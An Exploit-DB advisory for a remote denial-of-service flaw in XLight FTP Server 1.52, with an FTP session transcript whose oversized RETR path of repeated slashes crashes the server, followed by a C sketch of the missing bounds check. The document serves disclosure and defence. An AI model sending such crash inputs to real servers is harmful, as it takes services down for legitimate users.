XLight FTP Server 1.52 - Remote Send File Request Denial of Service Vulnerability

2004-02-16T00:00:00
ID EDB-ID:23701
Type exploitdb
Reporter intuit e.b.
Modified 2004-02-16T00:00:00

Description

XLight FTP Server 1.52 Remote Send File Request Denial of Service Vulnerability. CVE-2004-0287. DoS exploit for the Windows platform.

source: http://www.securityfocus.com/bid/9668/info

A remote denial of service vulnerability has been reported in the Send File Request functionality of the XLight FTP server. The issue is due to insufficient bounds checking.

Upon successful exploitation, a remote attacker may be able to cause the affected server to crash, denying service to legitimate users.

ftp> open
To www.example.com
Connected to www.example.com.
220 Xlight Server 1.52 ready...
User (www.example.com:(none)): test
331 Password required for test
Password:
230 Login OK.
ftp> literal pasv
227 Entering passive mode .
ftp> literal retr /////////////////////////////////////////
///////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////
//////////////////////////////////////////qwer
Connection closed by remote host.
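
The bounds check the advisory says is missing, sketched as an added example (not XLight's code and not part of the original advisory): a RETR argument is length-checked, has runs of '/' collapsed, and is copied only while it fits the destination buffer. The helper name `parse_retr`, the status codes and both size limits are assumptions made for illustration.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define MAX_CMD_LINE 512 /* assumed cap on one control-channel line */
#define MAX_PATH_ARG 260 /* assumed size of the path buffer */

enum retr_status { RETR_OK, RETR_NOT_RETR, RETR_EMPTY,
                   RETR_LINE_TOO_LONG, RETR_PATH_TOO_LONG };

/* Hypothetical helper: parse "RETR <path>", collapse runs of '/', and copy
 * the result into out only while it fits; out is left empty on any failure. */
enum retr_status parse_retr(const char *line, char *out, size_t outlen)
{
    static const char verb[] = "RETR";
    size_t i, o = 0;

    if (outlen == 0) return RETR_PATH_TOO_LONG;
    out[0] = '\0';
    if (strlen(line) > MAX_CMD_LINE) return RETR_LINE_TOO_LONG;
    for (i = 0; i < 4; i++) /* stops at the NUL of a short line */
        if (toupper((unsigned char)line[i]) != verb[i]) return RETR_NOT_RETR;
    if (line[4] == '\0' || line[4] == '\r' || line[4] == '\n') return RETR_EMPTY;
    if (line[4] != ' ') return RETR_NOT_RETR;
    i = 4;
    while (line[i] == ' ') i++; /* skip separator spaces */
    for (; line[i] && line[i] != '\r' && line[i] != '\n'; i++) {
        if (line[i] == '/' && o > 0 && out[o - 1] == '/') continue;
        if (o + 1 >= outlen) { /* no room for this byte plus the NUL */
            out[0] = '\0';
            return RETR_PATH_TOO_LONG;
        }
        out[o++] = line[i];
    }
    out[o] = '\0';
    return o ? RETR_OK : RETR_EMPTY;
}

int main(void)
{
    char out[MAX_PATH_ARG], line[400]; /* constructed sample input below */
    memcpy(line, "RETR ", 5);
    memset(line + 5, 'A', 300);
    line[305] = '\0';
    printf("%d\n", parse_retr("RETR /pub//readme.txt\r\n", out, sizeof out));
    printf("%s\n", out);
    printf("%d\n", parse_retr(line, out, sizeof out));
    return 0;
}
```

A request that fails the check would be answered with an FTP error reply instead of being passed to the file-handling code.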